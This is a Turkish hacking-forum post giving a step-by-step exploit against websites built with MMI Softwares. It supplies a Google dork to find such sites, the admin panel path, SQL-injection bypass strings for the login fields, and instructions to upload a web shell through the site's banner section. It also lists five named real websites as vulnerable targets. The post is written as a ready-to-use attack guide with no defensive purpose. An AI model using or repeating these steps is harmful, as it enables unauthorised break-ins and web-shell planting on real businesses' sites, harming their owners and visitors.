TurKLoJeN
Özel Üye
Merhaba Arkadaşlar Bugün MMI Softwares Dork Exploitini Göreceğiz
[hide]
İlk olarak dorkumuzu google üzerinden aratalım
PHP:
Dork : intext:"Design by MMI Softwares" inurl:admin.php
Dorkumuz ile çıkardığımız sitelerin admin Paneline gidelim
PHP:
Admin Panel : site.com/admins/mmi-admin.php
Şimdi kullanıcı adı şifreyi girelim
PHP:
Username: '=''or'
password: '=''or'
Giriş yapıp Design sayfasına gidip Banner Master bölümünden shell'inizi yüklüyebilirsiniz
PHP:
Örnek Zafiyetli Siteler
http://www.krishnagoldsindustries.com/admins/mmi-admin.php
http://www.ggchain.in/admins/admins/mmi-admin.php
http://www.jjebook.com/admins/mmi-admin.php
http://www.anuradhatextile.com/admins/mmi-admin.php
http://shalimarpalace.in/admins/mmi-admin.php
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit Hakkında
PHP:
Exploit Başlığı : MMI Softwares admin page bypass vulnerability / upload shell
Tarih : 2018-09-08
Dağıtıcı Sahibi : http://www.mmsoftwares.com/
Exploit Sahibi : nothing404.team
Test Edilen Sistem : Kali Linux
[/hide]